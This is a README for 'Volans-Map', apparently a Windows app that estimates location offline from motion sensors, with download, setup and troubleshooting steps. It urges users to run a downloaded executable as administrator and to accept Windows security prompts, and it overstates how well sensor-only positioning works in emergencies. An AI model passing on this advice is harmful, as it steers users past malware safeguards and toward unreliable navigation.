Volans-Map is an offline navigation app for Windows that helps you estimate your location without GPS or internet access. It uses built-in device sensors and a Kalman filter to track movement and estimate latitude and longitude.
Use it when you need a map-based navigation tool in places where signal is weak or unavailable, such as remote roads, basements, warehouses, or areas with poor network coverage.

On the releases page, look for the latest version and choose the Windows file that matches your device. In most cases, this will be an .exe file or a packaged Windows download.
Volans-Map is built for Windows desktop use. For the best experience, use a system with:
- Windows 10 or Windows 11
- A working accelerometer, gyroscope, and magnetometer
- At least 4 GB of RAM
- 200 MB of free disk space
- Administrator access for first-time setup
- A screen resolution of 1366 × 768 or higher
For location estimation to work well, the device should have access to the internal motion sensors used by the app.
- Open the GitHub Releases page.
- Find the latest release at the top of the list.
- Download the Windows file for that release.
- If the file is a
.zip, extract it to a folder on your PC. - If the file is an
.exe, double-click it to start the app. - If Windows shows a security prompt, choose the option to run the app.
- Follow any on-screen steps to complete setup.
- Keep the app in a folder you can find again, such as
DownloadsorDesktop.
After installation, launch Volans-Map from the file you downloaded or from the folder where you extracted it.
If the app opens in a window, you can start using it right away. If it asks for sensor access or device permission, allow it so the app can read motion data from your system.
- Open the app.
- Keep your device on a stable surface for a few seconds if the app needs to calibrate.
- Move the device as you normally would during travel.
- Watch the app estimate your position using sensor data.
- Use the displayed latitude and longitude values to understand your current location.
- Check the map or position view as you move.
- Recalibrate if the position drifts too far from your real location.
Volans-Map helps with offline navigation by estimating movement from sensor inputs instead of relying on GPS. It is useful for:
- Offline tracking in remote areas
- Navigation in places with no phone signal
- Movement estimation inside large buildings
- Emergency use when GPS is not available
- Local positioning on supported Windows devices
The app reads motion data from sensors built into the device:
- Accelerometer for movement changes
- Gyroscope for rotation and direction changes
- Magnetometer for heading support
It then combines that data with Kalman filtering to reduce noise and improve the position estimate. This helps the app provide a smoother result than raw sensor data alone.
For the best results:
- Keep the device charged
- Place the device on a level surface before calibration
- Avoid shaking the device during startup
- Close apps that may use sensors in the background
- Use the app in the same orientation when possible
If this is your first time using Volans-Map:
- Install or extract the downloaded files.
- Open the app once so Windows can register it.
- Allow sensor access if asked.
- Wait a moment for the app to settle and read your device data.
- Move the device slowly at first to help the app build a stable estimate.
If you keep the app in a clean folder, it is easier to open later.
A simple folder structure can look like this:
C:\Volans-Map\C:\Volans-Map\Data\C:\Volans-Map\Logs\
This is not required, but it can help if you want to keep the files together.
- Run the file as administrator
- Make sure the download finished completely
- Check that Windows did not block the file
- Try downloading the latest release again
- Recalibrate the device
- Keep the device still for a short time
- Make sure the sensors are active
- Restart the app and try again
- Close other heavy programs
- Restart Windows
- Check that your device meets the system requirements
- Use the latest release
- Make sure the device has the needed sensors
- Check Windows privacy settings
- Reconnect any external sensor device if you use one
- Restart the app after changing settings
Only download Volans-Map from the official GitHub releases page:
This helps make sure you get the latest build from the repository.
Volans-Map fits well in situations where standard GPS tools fail:
- Rural travel
- Underground areas
- Indoor navigation
- Industrial sites
- Temporary field work
- Emergency backup use
- Start from a known point if possible
- Keep the device steady during launch
- Move at a normal pace
- Avoid sudden rotations
- Recalibrate when the app drifts
- Use it on supported hardware with strong sensor support
Volans-Map is designed for Windows users who want a simple offline navigation tool. If your device has built-in motion sensors, the app should be able to use them without extra setup.
If your PC does not include these sensors, you may need a compatible external device or supported hardware for full use.
If you need to reinstall or update later, return to the release page and download the newest build:

- Download the latest release.
- Open or extract the file.
- Start the app.
- Allow sensor access.
- Calibrate the device.
- Begin navigation.
- Recalibrate when needed
